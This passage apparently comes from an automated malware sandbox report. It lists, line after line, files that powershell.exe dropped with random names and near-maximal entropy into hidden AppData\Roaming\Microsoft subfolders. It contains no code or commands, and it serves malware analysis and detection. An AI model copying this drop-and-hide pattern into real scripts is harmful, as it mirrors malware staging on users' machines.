Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HXbuCBfVQgsWv.aFDROxYrBKZwqUvpk entropy: 7.99712853844	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ObfWeiFngl.HvgPwoQmBjUpTdifVGI entropy: 7.99777930884	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\suCpkVdZmfBzJbLqT.FhKWAqfaMnvHOU entropy: 7.99883539803	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JxnIgcXhPzFlDZtaQs.JhublzTrcLqw entropy: 7.99788478739	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jeYBAdKIPVcDXhsWL.zYVKdqyvOgmAGk entropy: 7.99793308836	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\iEzqkoWjrKlyTD.bfnLoGcapNwSrqgU entropy: 7.99838266139	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\fVcmBuXaWeRtCFr.TQRGojYVyxNbCK entropy: 7.99717236603	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IWELGeqgpsAMPijX.uDkVyZzQwegiG entropy: 7.99902647785	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\abuNFTKoPVG.aItyjRumfk entropy: 7.99802782232	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RmIThqQrYvx.uYGfRlPCeH entropy: 7.99918098661	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\CuDtWSPxRf.RMalNjmdhTpzrFgIxSc entropy: 7.99890274564	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vOhWVLPyAIbJwHSmCt.wPifdBZjlX entropy: 7.99778937837	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\swlTBmZAnb.sHcdCtbYaiRFSqGOu entropy: 7.99795297931	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WEajqSMsRYDbmCrAXw.JkaRbmrHzUn entropy: 7.99898444499	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kujramzixNSqnpAe.mBzxfrGgZdECPlqV entropy: 7.99903136517	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jgeYPaxbOi.QUCDAZjydfuYgXGsnJv entropy: 7.99886568625	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nGKuTfPVclhRzMF.RWOplPBSuzUXfHML entropy: 7.99772035346	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\jhwSkizEpmgVnIBCQ.riAhHNcWxbLoau entropy: 7.99908334237	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\sZUqJLpYjzuVGSoHDPF.hrFcKISQTqC entropy: 7.99779529218	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\WSGDbaMFPOyCV.DhmVRCWPwZnbcpqOB entropy: 7.99811213384	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mRyupfblQnzEgSGB.UgIHfrDaVvTh entropy: 7.99822291983	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\owUjuETAskFtI.qdfyhSEnlFiLpzH entropy: 7.99748532394	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\oEnktHuazZNx.SihVqjwLFgRKfTOnaxE entropy: 7.99769565807	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\uYwxUehiSoWqHcGpMtd.wzTNkYaZOMt entropy: 7.99824701582	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\HhlkFjgTMN.rqmRKZUAWwpiQLHF entropy: 7.99909487104	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\dBUuxjYbRCDaKm.dOWaEigxRLwAomVkDT entropy: 7.99741535452	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\FsLNgGzAoERUOYu.FbwEkRGHMxZKCWsgXz entropy: 7.99892333707	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hSxXzsETYI.UdWqkVrQYwiAeIOH entropy: 7.99723526292	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YyFknxAcQLvUeEXN.kZhNUQSjplfTmcJo entropy: 7.99645207179	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\fCWupEZiBzJwrRj.OjsfyGtuSe entropy: 7.99898273806	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\rBGChFUaKNZeMT.elwOiYBIHkqPUrJdj entropy: 7.99838099797	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\zNnZLXDVvW.NDKBSlQRPuCWkhr entropy: 7.99875628708	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\kvAOLpQChsVPulcFYW.bhOGDkfNuKr entropy: 7.99900302167	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JgYfPrvXaNVyLCSwTO.NKCIczoUpFORhAxdYBk entropy: 7.99898329461	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wWGZCMIvXd.spvGAyXPZTxmOqeJFi entropy: 7.99882941594	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wFosMBlNnj.pwrIhQRELOtAs entropy: 7.99898639995	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\PzbMTQRnspNCmD.bHWvqgoDsASPuZdT entropy: 7.99871099301	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\VeXOCEPIgcrnAlpmS.NrgdtJZyUaeqYAIO entropy: 7.99793651556	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\riluWcORBwgDpKaTxJ.pCdHyrlPuktThNvEox entropy: 7.9971621329	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\nVtwbXEIvzJ.AOzNUvbtED entropy: 7.99784928143	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\YSJRqueKrWDMXcf.mpNueMrxSL entropy: 7.99868253703	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\oflJPunmFGs.NdsmBvfojFTyWlI entropy: 7.99675193507	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hIPsocBjaUyOqWti.JHutNArwyzmxWfQK entropy: 7.99846309715	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\KzSqBraGTCYHpyEem.dxOzNjXafvpsLYRrZ entropy: 7.99878373088	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\TFrOzKbfuNn.VEiftFwzYZa entropy: 7.99730657424	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hcCwgPHLSEfDk.RDVQyiwPlmbMvILXh entropy: 7.99896379873	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QeURHgVGfO.wWGyBLsIXg entropy: 7.99780349647	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UNPQltKgCkcfTzBdj.LHkDuBCGWAQdqKje entropy: 7.99734381155	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\pjtyMvCHWgUiF.SFegkQGOAshafHDyYMc entropy: 7.99748158799	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\hAcGMTpVXNgSKd.hJxUGdyFSZq entropy: 7.99690911073	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\pjOhWoBHKPycIq.RUHcBqgSFNlAnsrut entropy: 7.99893189549	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\yIFZoDicJAxjglRT.gvepLyUAWrbGi entropy: 7.99869850019	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\AgVzxdZkmRMrYFU.AMkUKcGvTE entropy: 7.99865306074	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\mzwGWruxqnUhIjTFdB.VXMzbKmqWjGQaoygSxf entropy: 7.99764418989	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\GTzfBLHUSKn.ocfUguEeizYQqZmKX entropy: 7.99885688741	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\PZOcyHMJvil.HvmBqxPieNlFf entropy: 7.99845541765	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YEgicBrPmk.RdaChZYGpoxQwuvqDr entropy: 7.9989863319	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\NfYKzQnmhldLPDCUJTR.ghVmBHMpNrlUz entropy: 7.99621073707	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BNgfnqclVwHb.AqZNzUeMbsWFLnaX entropy: 7.99783917559	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\jOyrfkFDHhNlW.ElyZiTJVtpskfN entropy: 7.99889671321	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\mwsOkuCdnyIKbM.LmMyiYrBIFTSPQXxcAg entropy: 7.99865938239	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rgAUvnByWkDjZae.bTudVpkxJmvyGQYEnlg entropy: 7.99831317353	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\olZOXTePaAngE.JIhlosSFNxGB entropy: 7.99902347314	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pmEYyfzLTRHax.NhZgMmKLveYRXbWEjai entropy: 7.99864602939	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GEzlAsehvCnubfNryk.TyfOlZtzWbFVeN entropy: 7.99897609808	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rHJzGlqjNpQbB.XioWZzQuAyDKhwep entropy: 7.99846104765	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\jcPYiEgfnxqmz.FrEVkQoLsDCdwa entropy: 7.99858900918	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\JIZCYkfRxcoeivmzg.LHnbseIfEQC entropy: 7.99865130266	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\WDnZCwGhEIc.PnDcSQVxIAZwhK entropy: 7.99874776338	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\RdJiEbAhCkarnM.gRUvYCDKPhlSOIW entropy: 7.99798133789	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\DnzrVtCZmdNYWpke.dSizReoBHJLN entropy: 7.99747324876	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\YQghvUOIRSomyxbG.rHFQSZhntqobwfLjmdy entropy: 7.9989756805	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\SFWnDOXpNfKzsed.NCmZpjwdWKlvM entropy: 7.99894880238	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\tSqHKzUQeloWLGn.NtbIaTWygsEZYAok entropy: 7.99732228754	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hKMRVtnWYzHGuAQBP.vwxUHMpgXftzB entropy: 7.99614922554	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uYMZqxJRvPEW.iqJFLYRjokEwCOZB entropy: 7.99776342158	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\EQwgnsjVNrKuSJ.kbKXiwlnVZ entropy: 7.99770212566	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iwuaxekSBZcqjvUX.eMbilVQGIXog entropy: 7.99836935894	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yGhnsaQNgtPpY.eOXmrLqkzSYQgyZnh entropy: 7.99868104817	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\jtAlIwLOvRFh.otxAuURVjy entropy: 7.99906597382	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gAGHavyZNwxQp.djAmHxhlQaoDfIqr entropy: 7.99841679559	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hNfqaRTzrMklKWAyHcX.bzisjZKpXHoBG entropy: 7.99906437912	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\KHqfjSmrYCQXAFWg.NcIzfXhVJQLdnTa entropy: 7.99897756334	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hJubnGAQmLE.PTAlIqaNYZoUhVeQXm entropy: 7.99916776293	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\IHrEsSWUYv.WlfpLikuAXjVtDxhws entropy: 7.9984626369	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\EfamwJKIDNd.SKCXawJpWjTVEbiAPm entropy: 7.99882048448	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zQNCJPBkutUl.EJgZczDuCSjwnVHs entropy: 7.99895368871	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cTiCMnIvsloge.wIQZtTufGBgDhHCnlJ entropy: 7.99889541764	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zonHeADUfvIJyuT.jCUqEmOsWvAZG entropy: 7.9987416652	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\EnqNTgMzOlfVW.HAXDPyMYOmTKLih entropy: 7.99887481853	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\uQRdeLbqtzv.eHVKdZDjbPuQJhC entropy: 7.99856034255	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\GEybJBlxVH.cIXRjqTfMhPBYsziFxS entropy: 7.99844439821	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cxpQviPowtRuZVrDT.lbmjGsVipUvSMadJcrP entropy: 7.99849465086	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\fkjBnAtzuCdFhrqOaN.dTNKsmhoEM entropy: 7.99882553577	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\wrpGDBsuCKxNnvWHOP.zueNptWYJbITPXV entropy: 7.9985924971	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZjwoclQHNa.UJolTCPMfBdFLSqjvWs entropy: 7.99890964291	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ZNUfdQETzkiLmtPXlaD.pEYRjurNsqHJPCZfok entropy: 7.99870464821	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oanLetbTJqWrs.iLASgomVsKGnWBCN entropy: 7.99864624079	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pxcFHmkvrqbeUsT.gvfihVCLUBGKR entropy: 7.99855562689	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\apEDckxwfTK.uAhIMUapmgfWirnV entropy: 7.9991042968	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\RmbDKTPvMuhsAeSqgL.IbiBASdKMJVtrzgsU entropy: 7.99684508213	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hLNVibmTFDpRd.wJepWrQaGbDuvVsfNLj entropy: 7.99812374475	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\LlrkBaCDsTpXFW.mWplMxeNQdPX entropy: 7.99837239821	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\xpDsoHPzFauLlg.VpQBHEPTurFvflqO entropy: 7.99765571267	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\OFhiRwEuxSNIGK.EkvxdViBQT entropy: 7.99689181485	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\VbelOTsSNzKE.raSCejEMnqZbPyBxdh entropy: 7.99911104315	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\FfhZkiGWjwogXMJSNTn.ipJRafdUYENzDZvhjWu entropy: 7.99780355747	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iYkjyUrVQMntCNK.YZlsXiBROPuJ entropy: 7.99905860485	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CpPvLSfHlyu.juEBDIYUWVHy entropy: 7.99896659368	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gaXIlFruinhfJoKj.LtTPMokVqdK entropy: 7.99904626634	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\VdtquahKJRb.OrhuFXtpkMK entropy: 7.99900172994	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\yftHNmkjwCdlP.qBURMOIiVfaQEgbTyLN entropy: 7.9978112311	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rLuwaWktsvQ.xerluYTsdHpVNwoi entropy: 7.99815139903	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\QfLspAEMwytFNGOuI.ceByAKVIxn entropy: 7.99869266347	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nfwJXpRqDGBzkj.UcvFBZNVaOQMiIL entropy: 7.99846153426	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iFxubwAOpTLo.FcswYeQtDIKAUir entropy: 7.99804585667	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zyGFSfleNJwnZo.MSbztpYaCAmODWEGP entropy: 7.99906696428	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\XslYiqRgVGcJaxAKje.vrImXbdgsV entropy: 7.99793186023	Jump to dropped file
